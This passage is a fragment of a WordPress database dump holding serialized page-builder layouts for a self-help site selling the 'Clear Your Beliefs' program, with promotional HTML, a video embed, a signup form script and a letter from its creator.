box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:702:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, \nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:9;a:4:{s:5:"title";s:6:"script";s:4:"text";s:78:"<script>\nvar container = $(''#pg-1450-2'').height();\nalert(container);\n</script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"7";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1114, 1599, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:734:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">\nDownload the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.\n</p>\n<center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:863:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:702:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, \nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1117, 1602, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:557:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n\n<center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:880:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:719:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 87px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1115, 1600, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: 